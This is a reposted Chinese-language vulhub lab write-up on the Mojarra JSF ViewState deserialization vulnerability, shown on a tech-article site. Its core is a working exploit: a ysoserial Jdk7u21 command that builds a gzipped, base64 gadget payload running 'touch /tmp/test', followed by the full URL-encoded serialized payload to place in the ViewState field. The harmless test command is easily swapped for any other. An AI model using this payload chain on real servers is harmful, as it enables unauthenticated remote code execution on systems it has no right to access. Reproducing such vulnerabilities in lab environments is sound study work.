栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

vulhub漏洞复现-Mojarra JSF ViewState 反序列化漏洞

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulhub漏洞复现-Mojarra JSF ViewState 反序列化漏洞

Mojarra JSF

JavaServer Faces (JSF)是一种用于构建 Web 应用程序的新标准 Java 框架,常见的同类型的框架,如Strut2,Yii(构建 Web 应用程序的php框架)等等等等。mojarra是JSF框架的一个实现一个产品

思路

在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行验证,所以我们可以在验证处按照对应加密规则放上我们想要执行的恶意命令

JSF中的ViewState也查不到,是用来验证,用来确保请求只发一次?

漏洞复现
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 "touch /tmp/test" | gzip | base64 -w 0

手动进行url编码

H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjNo3n2mdKWPKC7zTvBEW0epDU4JMJpKuGDGa8n9rbr3e3ubLJBojf%2bAITKnQNwaDj0QqsekCpuLRckJFBRJbhwAw4VEhce3%2bxu4igJtVu60u7Mfq/5vm9%2b8823%2bSvU2xZ0XqFrVHK4qklpVb/KChepXcow/oP2/Ts3Hg0cCwG4FrRUpAL%2b3bkPbnx85/ZIGPnmegIAms%2bdB/GE0OqrilGWbEeXDKsoUZMqJSa5VKO6pOqcWTrVJNfWuCJxi7rSMiubGuXMTuHYcHnxnr55czgMkRQ05lS9wHT%2bllPOMysFB3KooNsa4ymku1mI5/IbnClGgdkcwtnsTBYiOUWjNv62ZtPCbRmXLcqzgpZMQ31Op2WGzB28DLdUvYjMlpzhcNPhS5ZhMourwmiHLyhilyv0pGuKWP/Bx7G8hd/8q7u9WPxxXCRM8EJID2VnNh93/hmJLf8UkCOf3P/77lfIHoLJOIThxSiMR%2bF0FF4i0GwzS6XaCrNs1dAvpeYIkDcINM4aus2pzleo5rD6L3o%2bevzho99fIxCZUnWV4yTc179CoG4Ws0CgCbeR%2bflapnkNKa1pQ0GzFI3jf0Cs4yXVJnAww538cpDTJbqhGbRAIJHSdWZ5KWMoNJresA3fOdn0ZWw/IRdooci4fWofK0kCDd5mrRpWmYDVl0ZMyIgJGTEh%2b5iQPUzIW5iQPUzIc4sLyey%2b0mWtIuv7o77HLDkTTCnHvF2kekFjVlKkJFYwFKeM%2bCFw5qmWR9WSbwfDn/n/zhCIv%2b4qzBQ0Owq9BD57unxU9aDAy/Lc8sK0q9opJFFuWNWVasqhGpgTOHgWLwhEg1wSmH4emcwYjqWweVXAOBEgUBKHNAFxeCEKfQSGnwGwBM7XuiOWo3O1zOTpvI0QV/iWJQJtXrFQjYrz3mmbrNXylqVttBA4XiUW3KIpRQtKQUulqr3tOxmFAcwZCgb/BNr7%2btN7xJIJeAXOxOFlkLCGcMNRSj0yL5sylmUeg7NYMZjLFAK9fXsr5057WCMVhqU2gSVuWNgbwRKW4VS5ukDNoPgcqYS0tI6VZmhkeGJ0aHxwcmhwbJLAsfST%2bEk4ASEsnegRvoegHiI4RkXJhZhHQxTgV9xJMo4Ex/qB20BueSKN%2bI14RAkO4DfhC0ATTOCIFRHaUEoon8M3LGi7FYc9xR6fGSiKWTt0eHwCndCFGt04930UZg8HZlMedR%2bz457ZAZ%2b5r9kjcBQ1xOwYHMflKwvEoH876FPIEVJNn0OYpO%2bA3Dr4JYxevuUpjnlBESHR461/AlpwjCMrBCehGRqca3AdbQH5bvuqOiyuqvYodEahKwrdtV5V135Rf5sqX%2bh6PldVeN4w9lxNp6teTahVS9E4ROBkDaYw9ArUF/NXmPLfh77awX0ijkntOE7uwnGrxz/ofdt27G6H2F2TQx2eKctcJ%2bDa73uYOCr8dyWsw9L2jV1pytytJlHELFlsVcOgJTzm7sbPvQ97vmmefRACkgZS4rgdlewEknJKX8NN3VnDXRNbxCHRHm5Zo7pucE9Gmt6e7lG8dP%2bPpvYH1z8NQSgNiTITwPGQhm1a0442DQsNNnN1fMPERq9lTxPoLb%2bro0WV%2bujDe193vPstHo15iIvtmsfSbmDX2cBLFrNLhlZwzaDJTazHRMsr0schtjpKR%2bnY2QlxcmLumlUlo1B5XNP9F3iIUkOJCwAA

进入后台查看

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/340027.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号